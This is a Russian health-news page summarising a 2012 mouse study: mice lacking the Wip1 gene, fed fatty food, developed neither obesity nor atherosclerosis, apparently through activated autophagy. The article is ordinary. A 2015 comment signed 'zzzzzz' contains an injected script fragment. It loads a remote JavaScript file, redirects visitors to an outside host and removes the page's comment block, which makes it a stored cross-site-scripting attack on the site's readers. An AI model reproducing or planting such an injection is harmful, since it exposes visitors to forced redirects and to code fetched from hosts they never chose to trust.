Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Новый механизм контроля о...  >>  Новый механизм контроля ожирения и атеросклероза
 
Обратная связь
 

Новый механизм контроля ожирения и атеросклероза

Размер шрифта
16 августа 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, что при отсутствии определенного гена у мышей не развиваются ожирение и атеросклероз. Что это за ген, и есть ли он у людей?

Что такое атеросклероз

Атеросклероз – это хроническое заболевание артерий, которое  возникает вследствие нарушения липидного обмена. Атеросклероз сопровождается отложением на стенках сосудов холестериновых бляшек. Они суживают просвет артерий, что приводит к ухудшению кровоснабжения различных органов и тканей. В результате развивается ишемия, т.е. кислородное голодание.

Атеросклеротические бляшки опасны тем, что они могут изъязвляться и приводить к закупорке сосуда. В результате, участок ткани, к которому не поступает кровь, погибает.

Симптомы атеросклероза зависят от того, какие сосуды вовлекаются в патологический процесс. Наиболее ярким примером атеросклеротического поражения сосудов является ишемическая болезнь сердца (ИБС), при которой нарушается кровоснабжение миокарда –  сердечной мышцы. В основе ишемической болезни сердца лежит несоответствие между потребностью миокарда в кислороде и его доставкой по артериям сердца. Ишемическая болезнь сердца опасна тем, что она может привести к инфаркту миокарда – гибели участка сердечной мышцы.

Что такое ожирение

Ожирение – это хроническое заболевание, проявляющееся увеличением массы тела за счет накопления жировой ткани. В норме в нашем организме постоянно поддерживается баланс между поглощенной и затраченной энергией. Ожирение развивается в том случае, когда поглощенная энергия превышает затраченную. Развитию ожирения способствует малоподвижный образ жизни, генетическая предрасположенность, легкоусвояемые углеводы, избыток которых откладывается в виде триглицеридов в жировой ткани, эндокринные заболевания.

Ожирение опасно тем, что оно является фактором риска различных заболеваний: сахарного диабета, сердечно-сосудистых заболеваний и рака.

Суть исследования

Исследование проводилось на мышах, у которых отсутствовал ген Wip1. Несмотря на то что в ходе эксперимента мышей кормили едой, богатой жирами, у них не наблюдалось ни ожирения, ни атеросклероза.

Оказалось, что отсутствие гена Wip1 приводит к активации аутофагии – процесса, с помощью которого организм людей разрушает компоненты клеток. В результате происходит разрушение капелек жира, что предотвращает развитие ожирения и атеросклероза.

Перспективы

Ученые надеются, что полученные результаты станут основой для разработки новых методов замедления роста опухолей. Подобно тому, как активация аутофагии подавляет развитие ожирения и атеросклероза, локальное воздействие процесса в области раковых клеток позволит разрушить компоненты клеток и замедлить рост опухоли.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Бурый жир поможет похудеть   Сливочное масло или маргарин?   Жир, который поможет вам избавиться от жира!   Как угробить свое сердце?!  
15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз! 27 февраля 2013Бурый жир поможет похудеть
 
19 февраля 2013Мальчик с ожирением не станет мужчиной 09 января 2013Всего одно яблоко в день защитит от атеросклероза
 

Слайдшоу

1
Что вы знаете об инсульте
Руководство по предотвращению инсульта
6 суперпродуктов от диабета

Тесты

1
Жиры, которые мы едим
Что вы знаете о холестерине?
Грозит ли вам инфаркт миокарда?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.